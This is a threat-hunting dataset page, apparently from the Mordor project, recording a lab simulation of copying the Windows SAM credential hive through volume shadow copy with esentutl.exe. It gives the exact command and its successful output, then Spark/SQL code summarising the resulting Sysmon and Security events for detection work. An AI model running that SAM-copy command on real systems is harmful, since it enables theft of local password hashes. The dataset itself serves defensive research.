SAM Copy via Esentutl VSS

Metadata

Author

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2020/10/19

Modification Date

2020/10/19

Tactics

[‘TA0006’]

Techniques

[‘T1003.002’]

Tags

[‘art.a90c2f4d-6726-444e-99d2-a00cd7c20480’]

Dataset Description

This dataset represents adversaries copying the SAM hive using the esentutl.exe utility and volume shadow copy services.

Notebooks

Notebooks created by the community leveraging the mordor datasets

Author

Name

Link

Simulation Plan

Environment

Tool Type

Module

Lab VM

Manual

Cmd

Adversary View

Microsoft Windows [Version 10.0.18363.1139]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Users\wardog>esentutl.exe /y /vss %SystemRoot%/system32/config/SAM /d C:\ProgramData\SAM

Extensible Storage Engine Utilities for Microsoft(R) Windows(R)
Version 10.0
Copyright (C) Microsoft Corporation. All Rights Reserved.

Initializing VSS subsystem...

Initiating COPY FILE mode...
    Source File: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32
Destination File: C:\ProgramData\SAM

                      Copy Progress (% complete)

          0    10   20   30   40   50   60   70   80   90  100
          |----|----|----|----|----|----|----|----|----|----|
          ...................................................

        Total bytes read                = 0x9000 (36864) (0 MB)
        Total bytes written             = 0x9000 (36864) (0 MB)


Operation completed successfully in 4.859 seconds.

C:\Users\wardog>

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/credential_access/host/cmd_sam_copy_esentutl.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+------------+------------------------------------+-------+-----+
|Hostname    |Channel                             |EventID|count|
+------------+------------------------------------+-------+-----+
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|10     |245  |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|13     |208  |
|WORKSTATION5|Security                            |4799   |186  |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|9      |117  |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|12     |77   |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|7      |55   |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|11     |4    |
|WORKSTATION5|Security                            |4658   |2    |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|18     |2    |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|5      |2    |
|WORKSTATION5|Security                            |4689   |2    |
|WORKSTATION5|Security                            |5156   |2    |
|WORKSTATION5|Security                            |5158   |2    |
|WORKSTATION5|Security                            |4904   |1    |
|WORKSTATION5|Security                            |4688   |1    |
|WORKSTATION5|Security                            |4905   |1    |
|WORKSTATION5|Security                            |4663   |1    |
|WORKSTATION5|Microsoft-Windows-Sysmon/Operational|1      |1    |
|WORKSTATION5|Security                            |4656   |1    |
|WORKSTATION5|System                              |104    |1    |
+------------+------------------------------------+-------+-----+
only showing top 20 rows